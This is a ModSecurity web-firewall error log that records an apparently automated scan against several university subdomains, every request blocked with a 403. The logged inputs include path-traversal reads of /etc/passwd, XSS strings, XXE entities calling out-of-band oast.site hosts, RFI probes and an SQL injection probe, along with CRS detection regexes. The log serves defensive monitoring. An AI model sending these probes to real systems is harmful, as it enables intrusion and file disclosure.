[Tue Aug 29 11:41:20.775452 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128MCo-f0AAAcqJNEAAAAG"]
[Tue Aug 29 11:41:20.777500 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAc0NdwAAAAM"]
[Tue Aug 29 11:41:20.798283 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAcqJNIAAAAG"]
[Tue Aug 29 11:41:21.399433 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128cCo-f0AAAc4EncAAAAP"]
[Tue Aug 29 11:41:21.539627 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26gwd8gm6nxab87m.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAc0NeYAAAAM"]
[Tue Aug 29 11:41:21.579306 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26gkkf45ys4wd1a6.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAc0NegAAAAM"]
[Tue Aug 29 11:41:21.670337 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26gr5dq3d4as41if.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAc0NewAAAAM"]
[Tue Aug 29 11:41:21.761251 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26grhue9ip6czxic.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAc0NfAAAAAM"]
[Tue Aug 29 11:41:21.963418 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26g1ao9rfq1fis3i.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAcqJNcAAAAG"]
[Tue Aug 29 11:41:21.988035 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128cCo-f0AAAaZ9r4AAAAo"]
[Tue Aug 29 11:41:22.021576 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128sCo-f0AAAcqJNoAAAAG"]
[Tue Aug 29 11:41:22.036482 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128sCo-f0AAAQkBbAAAAAC"]
[Tue Aug 29 11:41:22.051392 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128sCo-f0AAAaZ9sEAAAAo"]
[Tue Aug 29 11:41:22.427588 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128sCo-f0AAAaZ9sMAAAAo"]
[Tue Aug 29 11:41:22.447989 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26ghtzz8bkmsftfn.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128sCo-f0AAAUKhEwAAABC"]
[Tue Aug 29 11:41:22.487021 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO128sCo-f0AAAcqJOAAAAAG"]
[Tue Aug 29 11:41:22.495492 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128sCo-f0AAAaZ9sYAAAAo"]
[Tue Aug 29 11:41:22.509205 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO128sCo-f0AAAcqJOEAAAAG"]
[Tue Aug 29 11:41:22.529573 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO128sCo-f0AAAcqJOIAAAAG"]
[Tue Aug 29 11:41:22.567874 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO128sCo-f0AAActbL4AAAAH"]
[Tue Aug 29 11:41:22.568496 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO128sCo-f0AAAcqJOQAAAAG"]
[Tue Aug 29 11:41:23.363998 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO1288Co-f0AAAc2dRUAAAAN"]
[Tue Aug 29 11:41:23.369489 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAc0NfUAAAAM"]
[Tue Aug 29 11:41:23.369576 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAcbSEkAAAAv"]
[Tue Aug 29 11:41:23.371612 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAQkBbUAAAAC"]
[Tue Aug 29 11:41:23.392376 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO1288Co-f0AAAc0NfYAAAAM"]
[Tue Aug 29 11:41:23.451455 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO1288Co-f0AAAcbSE0AAAAv"]
[Tue Aug 29 11:41:23.454439 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAc0NfkAAAAM"]
[Tue Aug 29 11:41:23.472053 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAYf-RcAAAAD"]
[Tue Aug 29 11:41:24.385329 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129MCo-f0AAActbMYAAAAH"]
[Tue Aug 29 11:41:24.406891 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAQkBbwAAAAC"]
[Tue Aug 29 11:41:24.408389 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAc2dRsAAAAN"]
[Tue Aug 29 11:41:24.431527 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAcoNV0AAAAF"]
[Tue Aug 29 11:41:24.455742 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO129MCo-f0AAAc2dR0AAAAN"]
[Tue Aug 29 11:41:24.461800 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129MCo-f0AAAc4EoEAAAAP"]
